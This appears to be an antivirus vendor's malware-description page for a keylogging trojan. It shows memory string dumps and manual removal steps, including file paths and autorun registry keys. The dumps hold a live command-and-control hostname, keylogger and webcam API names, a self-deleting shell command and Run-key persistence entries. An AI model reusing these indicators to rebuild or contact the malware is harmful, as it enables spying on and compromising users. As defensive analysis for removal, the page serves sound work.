0THE COMMAND ECHOCONFIG TO CONFIG.NT OR OTHER STARTUP FILE.
0NTCMDPROMPT
0MS-DOS-BASED APPLICATION, WINDOWS RUNS COMMAND.COM. THIS ALLOWS THE
0TSR TO REMAIN ACTIVE. TO RUN CMD.EXE, THE WINDOWS COMMAND PROMPT,
0RATHER THAN COMMAND.COM, ADD THE COMMAND NTCMDPROMPT TO CONFIG.NT OR
0COMMAND.COM. IF YOU START AN APPLICATION OTHER THAN AN MS-DOS-BASED
0CONFIG.NT OR OTHER STARTUP FILE.
0WANT THE SYSTEM TO SUPPORT. 1 <= ALTREGSETS <= 255. THE
0AND LEAVE THE RESTS(IF AVAILABLE) TO BE USED BY DOS TO SUPPORT
0WITH YOUR APPLICATION OR _DEFAULT.PIF). IF THE SIZE FROM PIF FILE
D%WinDir%\SYSTEM32\HIMEM.SYS
Q001,437,%WinDir%\SYSTEM32\COUNTRY.SYS
S%WinDir%\SYSTEM32\COMMAND.COM
/P %WinDir%\SYSTEM32
ATION OR _DEFAULT.PIF). IF THE SIZE FROM PIF FILE
DEVICE=%WinDir%\SYSTEM32\HIMEM.SYS
COUNTRY=001,437,%WinDir%\SYSTEM32\COUNTRY.SYS
SHELL=%WinDir%\SYSTEM32\COMMAND.COM /P %WinDir%\SYSTEM32
%WinDir%\SYSTEM32\COUNTRY.SYS
[]|<> =;"
%WinDir%\TEMP\scs1.tmp
%WinDir%\SYSTEM32\COMMAND.COM
NTCMDPROMPTT
Unrecognized command in CONFIG.SYS
Insufficient memory for COUNTRY.SYS file
Incorrect order in CONFIG.SYS line $Error in CONFIG.SYS line $WARNING! Logical drives past Z: exist and will be ignored
1234567890-=
!@#$%^&*()_ 
789-456 1230.
!"#$%&,-./012
00030<0?0
30333<3?3
<0<3<<<?<
?0?3?<???
Windows NT MS-DOS subsystem Mouse Driver
/)()(00)(
/@%}-{.Nb#b
!Press any key to continue . . .
%Intermediate file error during pipe
Switches may be preset in the DIRCMD environment variable. Override
>Quits the COMMAND.COM program (command interpreter).
]Displays or sets a search path for executable files.
$B | (pipe)
%Displays the MS-DOS version.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
key to continue...."
PATH=PROMPT=COMSPEC=DIRCMD=
.COM.EXE.BAT?VBAPWRHSvDANEDSG
%WinDir%\SYSTEM32\DOSX
NT.EXE
C:\DOCUME~1\ADM\STARTM~1\PROGRAMS\STARTUP\FILE0.EXE
nt.exe
DOSX.EXE

ntvdm.exe_484_rwx_000A0000_00020000:

66666666
6666666
6666666666666666
6666666676666666
6666667076666666

ntvdm.exe_484_rwx_000C9000_00013000:

COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
OS=Windows_NT
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
SYSTEMROOT=%WinDir%
TEMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
%System%\DOSX.EXE
%System%\mscdexnt.exe
VCDEX.DLL
%System%\redir
(load before dosx.exe)
C:\LANMAN.DOS
%System%\dosx
%System%\krnl386.exe
krnl386.exe
SYSTEM.INI

ntvdm.exe_484_rwx_000E8000_00008000:

00030<0?0
30333<3?3
<0<3<<<?<
?0?3?<???
Windows NT MS-DOS subsystem Mouse Driver

ntvdm.exe_484_rwx_00100000_00010000:

C:\DOCUME~1\ADM\STARTM~1\PROGRAMS\STARTUP\FILE0.EXE
FILE0 EXE
."/\[]:|<> =;,
c:\wina20.386
%WinDir%\SYSTEM32\COUNTRY.SYS
<META HTTP-EQUIV="Refres
89:;<=>?
1234567890-=
!@#$%^&*()_ 
789-456 1230.
!"#$%&,-./012
%WinDir%\SYSTEM32\COMMAND.COM
%File allocation table bad, drive %1
Invalid COMMAND.COM
!Press any key to continue . . .
Cannot execute %1
Error in EXE file
%WinDir%\TEMP\scs2.tmp
arameter vaCOMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
OS=Windows_NT
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
SYSTEMROOT=%WinDir%
TEMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=hXXp://VVV.gulfup.com
\COMMAND.COM
COMSPEC=\COMMAND.COM
BMicrosoft(R) Windows DOS
FCOMMAND [[drive:]path] [device] [/E:nnnnn] [/P] [/C string] [/MSG]
H [drive:]path Specifies the directory containing COMMAND.COM file.
N /MSG Specifies that all error messages be stored in memory. You
%Intermediate file error during pipe
Switches may be preset in the DIRCMD environment variable. Override
>Quits the COMMAND.COM program (command interpreter).
]Displays or sets a search path for executable files.
$B | (pipe)
%Displays the MS-DOS version.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
key to continue...."
PATH=PROMPT=COMSPEC=DIRCMD=
.COM.EXE.BAT?VBAPWRHSvDANEDSG
%WinDir%\SYSTEM32
[]|<> =;"

svicihioiict.exe_1016:

.text
`.rsrc
@.reloc
v2.0.50727
w.exe
Microsoft.VisualBasic
System.Windows.Forms
System.Drawing
avicap32.dll
user32.dll
kernel32.dll
Microsoft.VisualBasic.ApplicationServices
.ctor
System.CodeDom.Compiler
System.ComponentModel
Microsoft.VisualBasic.Devices
System.Diagnostics
m_MyWebServicesObjectProvider
.cctor
get_WebServices
HelpKeywordAttribute
System.ComponentModel.Design
WebServices
Microsoft.VisualBasic.CompilerServices
MyWebServices
System.Runtime.CompilerServices
System.Runtime.InteropServices
System.Threading
get_ExecutablePath
System.IO
Operators
Microsoft.Win32
System.Collections
OperatingSystem
System.Text
System.Collections.Generic
System.IO.Compression
System.Reflection
ProcessWindowStyle
WebClient
System.Net
CopyPixelOperation
System.Drawing.Imaging
RegistryKey
GetKey
System.Net.Sockets
TcpClient
lastKey
Keys
keyboard
Keyboard
GetExecutingAssembly
wVirtKey
lpKeyState
GetKeyboardState
MapVirtualKey
GetKeyboardLayout
GetAsyncKeyState
vKey
OpenSubKey
8.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
_CorExeMain
mscoree.dll
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
svicihioiict.exe
asil66.no-ip.info
CreateSubKey
Windows
UseShellExecute
WindowStyle
GetSubKeyNames
DeleteSubKeyTree
DeleteSubKey
cmd.exe /k ping 0 & del "
ShiftKeyDown
WScript.Shell
cmd.exe
&explorer /root,"Í%

svicihioiict.exe_1016_rwx_00400000_00012000:

.text
`.rsrc
@.reloc
v2.0.50727
w.exe
Microsoft.VisualBasic
System.Windows.Forms
System.Drawing
avicap32.dll
user32.dll
kernel32.dll
Microsoft.VisualBasic.ApplicationServices
.ctor
System.CodeDom.Compiler
System.ComponentModel
Microsoft.VisualBasic.Devices
System.Diagnostics
m_MyWebServicesObjectProvider
.cctor
get_WebServices
HelpKeywordAttribute
System.ComponentModel.Design
WebServices
Microsoft.VisualBasic.CompilerServices
MyWebServices
System.Runtime.CompilerServices
System.Runtime.InteropServices
System.Threading
get_ExecutablePath
System.IO
Operators
Microsoft.Win32
System.Collections
OperatingSystem
System.Text
System.Collections.Generic
System.IO.Compression
System.Reflection
ProcessWindowStyle
WebClient
System.Net
CopyPixelOperation
System.Drawing.Imaging
RegistryKey
GetKey
System.Net.Sockets
TcpClient
lastKey
Keys
keyboard
Keyboard
GetExecutingAssembly
wVirtKey
lpKeyState
GetKeyboardState
MapVirtualKey
GetKeyboardLayout
GetAsyncKeyState
vKey
OpenSubKey
8.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
_CorExeMain
mscoree.dll
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
svicihioiict.exe
asil66.no-ip.info
CreateSubKey
Windows
UseShellExecute
WindowStyle
GetSubKeyNames
DeleteSubKeyTree
DeleteSubKey
cmd.exe /k ping 0 & del "
ShiftKeyDown
WScript.Shell
cmd.exe
&explorer /root,"Í%


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    File1.exe:312
    File1.exe:1648
    %original file name%.exe:1736
    netsh.exe:204
    svicihioiict.exe:1680

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\svicihioiict.exe (7385 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (836 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (836 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\File0.exe (72 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\File1.exe (128662 bytes)
    C:\DOCUMENTS AND SETTINGS (4 bytes)
    %Program Files%\WIRESHARK (16 bytes)
    %WinDir%\WinSxS (12 bytes)
    %WinDir%\AppPatch (4 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319 (672 bytes)
    %Documents and Settings%\All Users (4 bytes)
    C:\$Directory (3292 bytes)
    %WinDir%\Temp\scs2.tmp (10145 bytes)
    %System% (5136 bytes)
    %WinDir%\WinSxS\Policies\x86_Policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
    C:\PROGRAM FILES (8 bytes)
    %WinDir%\WinSxS\Policies\x86_Policy.6.0.Microsoft.Windows.Common-Controls_6595b64144ccf1df_x-ww_5ddad775 (4 bytes)
    %Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
    %System%\config (8 bytes)
    %System%\wbem (1064 bytes)
    %System%\drivers (32 bytes)
    %Documents and Settings%\All Users\Start Menu (4 bytes)
    %WinDir%\Temp\scs1.tmp (33880 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CLR Security Config\v2.0.50727.42\security.config.cch.new (752 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\1aa474a7e9c64d4ecae39105f8f64e52.exe (59080 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "1aa474a7e9c64d4ecae39105f8f64e52" = "%Documents and Settings%\%current user%\Local Settings\Temp\svicihioiict.exe .."

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "1aa474a7e9c64d4ecae39105f8f64e52" = "%Documents and Settings%\%current user%\Local Settings\Temp\svicihioiict.exe .."

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now